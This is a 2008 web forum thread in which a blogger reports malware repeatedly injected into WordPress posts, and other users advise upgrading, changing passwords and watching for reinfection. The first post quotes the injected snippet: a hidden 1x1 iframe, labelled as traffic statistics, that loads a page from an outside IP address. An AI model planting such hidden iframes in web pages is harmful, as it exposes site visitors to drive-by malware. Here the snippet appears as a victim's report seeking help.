Malware in WordPress

Discussion in 'WordPress' started by Ludus, Apr 17, 2008.

  1. #1
    Hope this is the right section to post.

    In two of my blogs created with WordPress I found a malware.

    This is the code I found in a post:

    <!-- Traffic Statistics --> <iframe width="1" height="1" frameborder="0" src="http://61.155.8.157/iframe/wp-stats.php"></iframe> <!-- End Traffic Statistics -->
    Code (markup):
    The version of WP is 2.3.3 and 2.1.2.

    Do you know how is it possibile to put this malware code in my posts?

    The blogs haven't users. It's the 3° or 4° time I found this code!
     
    Ludus, Apr 17, 2008 IP
  2. Boardwalk

    Boardwalk Well-Known Member

    Messages:
    1,651
    Likes Received:
    44
    Best Answers:
    0
    Trophy Points:
    140
    #2
    You should upgrade, WP 2.3.3 and 2.1.2 aren't safe.
     
    Boardwalk, Apr 17, 2008 IP
  3. wisdomtool

    wisdomtool Moderator Staff

    Messages:
    15,825
    Likes Received:
    1,367
    Best Answers:
    1
    Trophy Points:
    455
    #3
    Follow the upgrade instructions delete away the files and install WP 2.5. I guess they might have been hacked into.
     
    wisdomtool, Apr 17, 2008 IP
  4. aldin

    aldin Peon

    Messages:
    42
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #4
    aldin, Apr 17, 2008 IP
  5. falguni1

    falguni1 Peon

    Messages:
    3,016
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #5
    thanks for the link.
     
    falguni1, Apr 17, 2008 IP
  6. arwen54

    arwen54 Active Member

    Messages:
    632
    Likes Received:
    23
    Best Answers:
    0
    Trophy Points:
    60
    #6
    yes, upgrade, and change your passwords immediately
     
    arwen54, Apr 17, 2008 IP
  7. Ludus

    Ludus Active Member

    Messages:
    105
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    95
    #7
    Thanks to all for the answers. Must I change the passwprd of database or the WP control panel?
     
    Ludus, Apr 18, 2008 IP
  8. domainer_10

    domainer_10 Peon

    Messages:
    1,720
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    0
    #8
    I had this same hack happen when I was on 2.3.2. It seems to be the same group. Ive since upgraded but I noticed one other blogger and around the net some using 2.5 have been hit by this same chinese guy. I saw the new code and its very similiar to when i was hacked and my antivirus software went off thats how I knew it was on his blog.

    I dont know if 2.5 has fixed the problem or not, but I haven't been hit so far.
     
    domainer_10, Apr 20, 2008 IP
  9. EricBlackwell

    EricBlackwell Peon

    Messages:
    147
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    0
    #9
    I would agree completely. Change your passwords and upgrade. Those versions are not safe.

    Best;

    eric
     
    EricBlackwell, Apr 20, 2008 IP
  10. tombstone

    tombstone Peon

    Messages:
    180
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #10
    First of all do some things : your password must be from letters and numbers because is harder for them to hack your site.And second if you zipped the wordpress folder and extract it later , delete the zipp.SQL Injection is very efficient when it comes to wordpress.Wordpress still has many bugs.
     
    tombstone, Apr 21, 2008 IP
  11. jmafonseca

    jmafonseca Peon

    Messages:
    195
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #11
    Poor woman in Maine has her blog being used as a hacking base for thousands of other blogs....they inserted some 200 links to her blog on thousands of blogs under a hidden span tag. Google is going to ban her and she seems completely innocent. Trying to drop her a note right now, her blog is 2.3 and has been hacked....
     
    jmafonseca, May 19, 2008 IP
  12. domainer_10

    domainer_10 Peon

    Messages:
    1,720
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    0
    #12
    yeah you gotta keep to date, their is bots that are going around searching for older wordpresse versions. One of my sites got hit twice over a few months and different releases, so they keep lists or the bots are refinding the site.
     
    domainer_10, May 19, 2008 IP
  13. locjan

    locjan Peon

    Messages:
    201
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #13
    why not simply delete it? seach on your wordpress php file then delete it :D
     
    locjan, May 21, 2008 IP
  14. qforquack

    qforquack Banned

    Messages:
    46
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #14
    Because it can come back later.
     
    qforquack, May 21, 2008 IP